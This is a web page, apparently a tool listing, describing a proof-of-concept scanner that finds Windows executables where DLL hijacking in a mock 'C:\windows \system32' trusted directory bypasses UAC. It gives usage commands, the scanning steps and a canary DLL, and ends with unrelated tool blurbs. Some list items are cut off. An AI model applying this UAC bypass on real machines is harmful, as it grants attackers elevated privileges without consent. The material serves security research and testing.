DLLHijackingScanner is a PoC for bypassing UAC using DLL hijacking and abusing the “Trusted Directories” verification.
Generate Header from CSV
The python script CsvToHeader.py
can be used to generate a header file. By default it will use the CSV file dll_hijacking_candidates.csv
that can be found here: dll_hijacking_candidates.csv.
The script will check for each portable executable(PE) the following condition:
asInvoker
highestAvailable
requireAdministrator
-c
argument, the script will check if the DLL to hijack is in the list of DLLs imported form PE table.python .\CsvToHeader.py -h
usage: CsvToHeader.py -f [DLL_PATH] -c
CsvToHeader can be used to generate a header file from a CSV.
optional arguments:
-h, –help show this help message and exit
-f [DLL_PATH] Path of the csv to convert (default=”dll_hijacking_candidates.csv”)
-c Enable import dll in PE (default=False)
-v, –version Show program’s version number and exit
To generate the header file you can use the following command:
python CsvToHeader.py > dll_hijacking_candidates.h
Generate the list of vulnerable PE and DLL
The files that will be used are DLLHijacking.exe
and test.dll
.
DLLHijacking.exe is the file that will be used to generate the list of vulnerable PE. It will perform the following steps:
C:\windows \system32
.C:\windows\system32\[TARGET.EXE]
to C:\windows \system32\[TARGET.EXE]
[CUSTOM_DLL_PATH]
to C:\windows \system32\[TARGET.DLL]
C:\windows \system32\[TARGET.EXE]
C:\ProgramData\exploit.txt
to see if the exploit was successful.DLLHijacking.exe will always generate a log file exploitable.log
with the following content:
E.g.
1,computerdefaults.exe,PROPSYS.dll
0,computerdefaults.exe,Secur32.dll
Execution
Command to run:
DLLHijacking.exe [DLL_PATH]
if no argument is passed, the script will use the DLL test.dll
which is stored in the resouce of DLLHijacking.exe
.
Tested on Windows 10 Pro (10.0.19043 N/A Build 19043).
test.dll
test.dll
is a simple dynamic library that will be use to see if the exploit is successfully. The DLL will create a file C:\ProgramData\exploit.txt
with the following content:
This file will be deleted once the exploit is complete.
bevigil-cli provides a unified command line interface and python library for using BeVigil OSINT API. BeVigil…
Explore the comprehensive world of Open-Source Intelligence (OSINT) with our curated list of active links…
BBOT (Bighuge BLS OSINT Tool) is a recursive internet scanner inspired by Spiderfoot, but designed to…
Andriller - is software utility with a collection of forensic tools for smartphones. It performs…
Designed as a full-stack web application, this tool amalgamates a plethora of services to streamline…
Tools and packages that are used for countering forensic activities, including encryption, steganography, and anything…